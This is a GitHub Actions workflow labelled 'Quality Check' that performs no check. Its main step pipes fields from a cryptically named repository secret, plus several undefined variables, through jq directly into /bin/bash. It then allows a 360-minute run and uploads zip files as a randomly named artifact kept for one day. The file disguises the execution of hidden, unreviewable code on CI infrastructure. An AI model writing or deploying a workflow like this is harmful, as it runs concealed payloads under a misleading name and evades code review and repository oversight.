name: Quality Check
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  validate:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run task
        env:
          lk12363: ${{ secrets.lk12363 }}
        run: |
          printf '%s' "$lk12363" | jq -r .l833 | /bin/bash
          printf '%s' "$axwe5" | jq -r .q5329 | /bin/bash
          printf '%s' "$qhtdi2130" | jq -r .tosg3 | /bin/bash
          printf '%s' "$drl96790" | jq -r .dtglq699 | /bin/bash
          printf '%s' "$j9554" | jq -r .xikb52545 | /bin/bash
          printf '%s' "$itesx39468" | jq -r .gh356 | /bin/bash

      - name: Store output
        uses: actions/upload-artifact@v4
        with:
          name: LYYtrj5O
          path: "*.zip"
          retention-days: 1
